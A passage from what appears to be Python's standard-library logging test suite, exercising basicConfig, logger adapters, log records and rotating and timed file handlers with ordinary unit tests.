'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='%(asctime)s - %(message)s')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, '%(asctime)s - %(message)s')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def test_force(self):
old_string_io = io.StringIO()
new_string_io = io.StringIO()
old_handlers = [logging.StreamHandler(old_string_io)]
new_handlers = [logging.StreamHandler(new_string_io)]
logging.basicConfig(level=logging.WARNING, handlers=old_handlers)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
logging.basicConfig(level=logging.INFO, handlers=new_handlers,
force=True)
logging.warning('warn')
logging.info('info')
logging.debug('debug')
self.assertEqual(len(logging.root.handlers), 1)
self.assertEqual(old_string_io.getvalue().strip(),
'WARNING:root:warn')
self.assertEqual(new_string_io.getvalue().strip(),
'WARNING:root:warn\nINFO:root:info')
def test_encoding(self):
try:
encoding = 'utf-8'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='strict',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data,
'The Øresund Bridge joins Copenhagen to Malmö')
def test_encoding_errors(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors='ignore',
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, 'The resund Bridge joins Copenhagen to Malm')
def test_encoding_errors_default(self):
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertEqual(handler.errors, 'backslashreplace')
logging.debug('😂: ☃️: The Øresund Bridge joins Copenhagen to Malmö')
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
self.assertEqual(data, r'\U0001f602: \u2603\ufe0f: The \xd8resund '
r'Bridge joins Copenhagen to Malm\xf6')
def test_encoding_errors_none(self):
# Specifying None should behave as 'strict'
try:
encoding = 'ascii'
logging.basicConfig(filename='test.log', encoding=encoding,
errors=None,
format='%(message)s', level=logging.DEBUG)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
self.assertEqual(handler.encoding, encoding)
self.assertIsNone(handler.errors)
message = []
def dummy_handle_error(record):
_, v, _ = sys.exc_info()
message.append(str(v))
handler.handleError = dummy_handle_error
logging.debug('The Øresund Bridge joins Copenhagen to Malmö')
self.assertTrue(message)
self.assertIn("'ascii' codec can't encode "
"character '\\xd8' in position 4:", message[0])
finally:
handler.close()
with open('test.log', encoding='utf-8') as f:
data = f.read().strip()
os.remove('test.log')
# didn't write anything due to the encoding error
self.assertEqual(data, r'')
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
def test_nested(self):
class Adapter(logging.LoggerAdapter):
prefix = 'Adapter'
def process(self, msg, kwargs):
return f"{self.prefix} {msg}", kwargs
msg = 'Adapters can be nested, yo.'
adapter = Adapter(logger=self.logger, extra=None)
adapter_adapter = Adapter(logger=adapter, extra=None)
adapter_adapter.prefix = 'AdapterAdapter'
self.assertEqual(repr(adapter), repr(adapter_adapter))
adapter_adapter.log(logging.CRITICAL, msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, f"Adapter AdapterAdapter {msg}")
self.assertEqual(record.args, (self.recording,))
orig_manager = adapter_adapter.manager
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
temp_manager = object()
try:
adapter_adapter.manager = temp_manager
self.assertIs(adapter_adapter.manager, temp_manager)
self.assertIs(adapter.manager, temp_manager)
self.assertIs(self.logger.manager, temp_manager)
finally:
adapter_adapter.manager = orig_manager
self.assertIs(adapter_adapter.manager, orig_manager)
self.assertIs(adapter.manager, orig_manager)
self.assertIs(self.logger.manager, orig_manager)
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_find_caller_with_stacklevel(self):
the_level = 1
def innermost():
self.logger.warning('test', stacklevel=the_level)
def inner():
innermost()
def outer():
inner()
records = self.recording.records
outer()
self.assertEqual(records[-1].funcName, 'innermost')
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'inner')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'outer')
self.assertGreater(records[-1].lineno, lineno)
lineno = records[-1].lineno
the_level += 1
outer()
self.assertEqual(records[-1].funcName, 'test_find_caller_with_stacklevel')
self.assertGreater(records[-1].lineno, lineno)
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_is_enabled_for_disabled_logger(self):
old_disabled = self.logger.disabled
old_disable = self.logger.manager.disable
self.logger.disabled = True
self.logger.manager.disable = 21
self.addCleanup(setattr, self.logger, 'disabled', old_disabled)
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('root'))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in ('', 'root', 'foo', 'foo.bar', 'baz.bar'):
logger = logging.getLogger(name)
s = pickle.dumps(logger, proto)
unpickled = pickle.loads(s)
self.assertIs(unpickled, logger)
def test_caching(self):
root = self.root_logger
logger1 = logging.getLogger("abc")
logger2 = logging.getLogger("abc.def")
# Set root logger level and ensure cache is empty
root.setLevel(logging.ERROR)
self.assertEqual(logger2.getEffectiveLevel(), logging.ERROR)
self.assertEqual(logger2._cache, {})
# Ensure cache is populated and calls are consistent
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
self.assertFalse(logger2.isEnabledFor(logging.DEBUG))
self.assertEqual(logger2._cache, {logging.ERROR: True, logging.DEBUG: False})
self.assertEqual(root._cache, {})
self.assertTrue(logger2.isEnabledFor(logging.ERROR))
# Ensure root cache gets populated
self.assertEqual(root._cache, {})
self.assertTrue(root.isEnabledFor(logging.ERROR))
self.assertEqual(root._cache, {logging.ERROR: True})
# Set parent logger level and ensure caches are emptied
logger1.setLevel(logging.CRITICAL)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
# Ensure logger2 uses parent logger's effective level
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
# Set level to NOTSET and ensure caches are empty
logger2.setLevel(logging.NOTSET)
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Verify logger2 follows parent and not root
self.assertFalse(logger2.isEnabledFor(logging.ERROR))
self.assertTrue(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger1.isEnabledFor(logging.ERROR))
self.assertTrue(logger1.isEnabledFor(logging.CRITICAL))
self.assertTrue(root.isEnabledFor(logging.ERROR))
# Disable logging in manager and ensure caches are clear
logging.disable()
self.assertEqual(logger2.getEffectiveLevel(), logging.CRITICAL)
self.assertEqual(logger2._cache, {})
self.assertEqual(logger1._cache, {})
self.assertEqual(root._cache, {})
# Ensure no loggers are enabled
self.assertFalse(logger1.isEnabledFor(logging.CRITICAL))
self.assertFalse(logger2.isEnabledFor(logging.CRITICAL))
self.assertFalse(root.isEnabledFor(logging.CRITICAL))
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
def test_namer_rotator_inheritance(self):
class HandlerWithNamerAndRotator(logging.handlers.RotatingFileHandler):
def namer(self, name):
return name + ".test"
def rotator(self, source, dest):
if os.path.exists(source):
os.rename(source, dest + ".rotated")
rh = HandlerWithNamerAndRotator(
self.fn, backupCount=2, maxBytes=1)
self.assertEqual(rh.namer(self.fn), self.fn + ".test")
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(rh.namer(self.fn + ".1") + ".rotated")
self.assertFalse(os.path.exists(rh.namer(self.fn + ".1")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
# print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
